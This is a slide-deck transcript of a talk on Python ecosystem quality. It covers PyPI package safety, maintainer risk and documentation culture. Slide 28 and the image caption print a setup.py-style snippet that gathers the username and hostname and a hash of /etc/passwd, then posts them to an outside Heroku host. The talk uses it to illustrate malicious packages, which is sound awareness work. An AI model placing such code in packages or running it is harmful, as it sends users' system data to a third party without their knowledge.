The quality of the python ecosystem - and how we can protect it!
1 like2,110 views
The document discusses the quality of the Python ecosystem. It notes that while Python has many attractive qualities, the ecosystem faces challenges around library safety, documentation, and long-term maintainability. However, the community is the main driver of quality control. Improving tools for testing, verifying, and documenting libraries could help address issues. The responsibility of ecosystem quality ultimately lies with individual contributors collaborating openly through projects like PyPA to help evolve Python and PyPI.
![# `pip install magic`
import os, urllib, urllib2, hashlib, platform
try:
uname = os.getlogin()
except Exception as e:
uname = '[%s]' % e
try:
host = platform.uname()[1]
except Exception as e:
host = '[%s]' % e
try:
fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest()
except Exception as e:
fhash = '[%s]' % e
data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash})
try:
urllib2.urlopen('http://WannaPyCry.herokuapp.com/', data)
except Exception as e:
pass
Decoded trick
Nothing serious here
But could be a real hack](https://image.slidesharecdn.com/thequalityofthepythonecosystem-170627035739/85/The-quality-of-the-python-ecosystem-and-how-we-can-protect-it-28-320.jpg)
The quality of the python ecosystem - and how we can protect it!
- 1. The Quality of the Python Ecosystem Bruno Rocha - @rochaCbruno - brunorocha.org
- 2. Bruno Rocha - @rochaCbruno Quality Engineer @ RedHat.com Podcaster @ Castalio.info Teacher @ CursoDePython.com.br Blogger @ BrunoRocha.org
- 3. castalio.info youtube.com/castaliopodcast Every Monday 10AM Podcast to listen on itunes, rss, players etc Every Wednesday 7PM YouTube live!
- 4. “An ecosystem is a community of living organisms in conjunction with the nonliving components of their environment (things like air, water and mineral soil), interacting as a system” -- Wikipedia
- 5. - You (and your groups) - Communities (meetups and conferences) - theoretical Material (books, tutorials, courses) - Tools(systems, IDEs, platforms) - Package library (pip, github, conda) - Python Software Foundation - The Language (core developers) Ecossistema Python?
- 6. What attracts so many people to Python?
- 7. - Python is easy to learn. - The community is receptive - It has really cool events. - It's easy to write and publish new libraries with Python. - You thought in something ... you already have it in PyPI. - It is popular and fashionable. - Approved by Large companies. $ pip install magic >>> magic.run()
- 8. Or in the words of the Brazilian poet...
- 9. “In Python everything is object, it is also beautiful and wonderful.” (it makes more sense in Portuguese)
- 10. How to assure Software Quality? Enterprise ?
- 11. How to assure professional quality? ?Professional Python Certification! Became a professional for only $ 9.999,99 / year
- 12. How to assure the Quality of published libraries? ?Become “Python Developer Partner” Publish your libraries to “PyPI store” for only $ 9.999,99 / year PY
- 13. New Python 3.6 Featuring exclusive `f’string` Only $ 999/year You need Python 3.6 Call 555 - 5555 And buy it now! Oportunity: First 100 customers Will get IDLE for free...By Guido Inc.
- 14. Dude, how can you be so dumb?
- 15. ● Python has no owner, it belongs to the community. ● The community is quality control. ● The community is a certifying entity *. * In the Python community, EVERYONE are encouraged to participate and make a difference, collaborating with the various pillars of the community (slide 4) is of great value to the career of the Python professional.
- 16. YOU
- 17. “I came for the language but I stay for the community” - Brett Cannon
- 18. "Diversity happens when different people meet in one place" "Inclusion happens when these people can work together, as equals, with the same opportunities and without prejudice to any of them" - Naomi Ceder (Pycon Brasil 2016)
- 19. How to fight the community and diversity problems? - Code of conduct - Adopt a mentor's position, not a judge's.
- 20. Open by default - PSF (grants, membership, fellowship and board) - Repositories - Experiments (MyPy, Gilectomy) - APyB - Call 4 Papers - PyPI/Warehouse - Python Planet - PEPs - GruPys Você pode participar abertamente!!!
- 22. $ pip install magic >>> magic.run() - Python is easy! - Lot of libraries available
- 23. >>> Traceback Cannot do the magic today... - How many of the 100_000+ has test coverage? - Good documentation? - How do I choose?
- 24. $ pip install magic $ installing… $ HAHA you got hacked!!! - Are all that libs safe? - Anyone can publish a new lib in PyPI in few minutes, who assure the safety?
- 25. Safety!!!
- 26. # setup.py `pip install magic` from setuptools import setup setup( name="magic", ... ) Always review source code of the libs you are installing. Specially `setup.py` Don’t forget the scrollbars.
- 28. # `pip install magic` import os, urllib, urllib2, hashlib, platform try: uname = os.getlogin() except Exception as e: uname = '[%s]' % e try: host = platform.uname()[1] except Exception as e: host = '[%s]' % e try: fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest() except Exception as e: fhash = '[%s]' % e data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash}) try: urllib2.urlopen('http://WannaPyCry.herokuapp.com/', data) except Exception as e: pass Decoded trick Nothing serious here But could be a real hack
- 31. Solution?
- 32. $ pip install safety $ safety check
- 34. Open Source Community driven safety checks? Please create more Safety tools!!!!
- 35. Why “The Python” dont fix this issues without depending on third party services?
- 36. https://github.com/pypa New generation of PyPI is `warehouse` and you can help On Github.com/pypa Only 18 contributors?
- 38. Warehouse is a next generation Python Package Repository designed to replace the legacy code base that currently powers PyPI
- 39. Rank: 4.5 - safe Rank: 2.0 - outdated Rank: 1.0 - danger 1.234 Reviews ++ 1 Review --Why not making it more `social driven` to address the library quality problem? Example: More maintainers More quality points!
- 40. What to do about safety ? - Check before installing - Install known and trusted libraries - Use SafetyCI - pyup.io - Create (and share) more tools to help with verification - Report if lib is suspected - Collaborate to the Pypa / Warehouse project
- 41. The responsability is YOURS OURS!!!
- 42. Every library published in PyPI comes with an invisible tag that says: "I am aware of the responsibilities that I must assume when I publish this code and I promise to do my best to keep it with quality until the end of time!" And I'll leave it explicit if for any reason I can not keep leaving the path clear For anyone wanting to create a fork!
- 43. That “one man project” is not so cool Maintanable: Project that can be maintable by as many and diverse people.
- 45. Leftpad is ` npm` problem, will not happen with Python?
- 46. pip install requests ● 99.9% of installations of Python environments install requests ● If the version is not specified your build may break ● Tools like Travis-Ci depend on requests and have already broken for this! ● Operating systems bring requests by default ● Until a few months ago this was a 'one man band' project, but after recent issues with releases the creator decided to exclude himself as administrator from the lib and elected other maintainers ● It is not the only one, there are other Python libs published with the same risk ● Always specify your versions ● Use pyup.io or requires.io or any other solution of the type ● Use safety / IC or something
- 47. ….. Too many broken releases in a single day... TravisCi broke (even if you pinned the version) it was depending on requests itself. And backwards incompatible code was pushed. So the creator assumed the responsability and did the right thing! Thanks!!!
- 48. Safety and maintainability Are not the only problems!
- 51. Just like we did recently, changing our testing culture. We need efforts to change our documentation culture!
- 52. Q: Why most libraries do not have good documentation? A: Writing documentation is a boring process! Q: Why is it boring? A: Non-friendlier tools and formats (rst) drive people away from the documentation. We need to do as we did with the tests and adopt easier formats (md?) and tools. (in other words we need a `py.test` for documentation. Q: How to encourage people to contribute documentation? A: First we need to define the process (as well as in the tests) and then create a manifesto attracting contributors, showing the importance, providing a certain status to the documenter, and using the events to foster that culture.
- 53. Tips to write good libs python.apichecklist.com
- 54. Conclusion - Python is not a product! - The ecosystem (mainly the community) already has above average quality - We need more theoretical quality materials for beginners - Documentation is important we need to give it more focus - We can use tools to help in the QA of Python libraries - We can collaborate with the evolution of PyPI - We can collaborate with the evolution of Python - The quality of the ecosystem is OUR responsibility - Be responsible and publish only quality libraries in PyPI - We need a collaborative solution to classify 100,000+ libs - Collaborate!
- 55. Bruno Rocha - @rochaCbruno Quality Engineer @ RedHat.com Podcaster @ Castalio.info Teacher @ CursoDePython.com.br Blogger @ BrunoRocha.org